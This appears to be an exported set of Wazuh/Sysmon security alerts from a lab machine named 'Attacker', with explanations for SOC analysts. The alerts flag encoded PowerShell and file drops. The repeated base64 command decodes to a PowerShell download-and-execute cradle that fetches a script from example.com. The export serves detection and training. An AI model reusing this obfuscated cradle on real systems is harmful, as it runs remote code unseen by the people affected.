data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd7-680a-d00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  652
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.148+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.148+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1107410
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:11.3086728Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282616
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:11.299 ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} ProcessId: 852 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qvvde2p2.pvc.ps1 CreationUtcTime: 2025-04-24 22:36:11.299 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:11.299
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd9-680a-d30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qvvde2p2.pvc.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:11.299
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.519+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.519+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1110171
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:13.4580716Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282642
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:12.326 ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} ProcessId: 8684 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} ParentProcessId: 852 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:12.326
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcdc-680a-d60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8684
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd9-680a-d30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.534+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.534+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1118230
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:13.7009783Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282643
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:13.637 ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} ProcessId: 8684 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1 CreationUtcTime: 2025-04-24 22:36:13.634 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:13.637
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcdc-680a-d60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8684
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wxd2cw3n.5ae.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:13.634
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.022+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.022+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1120995
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:15.7536912Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282677
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:14.714 ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} ProcessId: 11988 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} ParentProcessId: 8684 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:14.714
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcde-680a-d90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

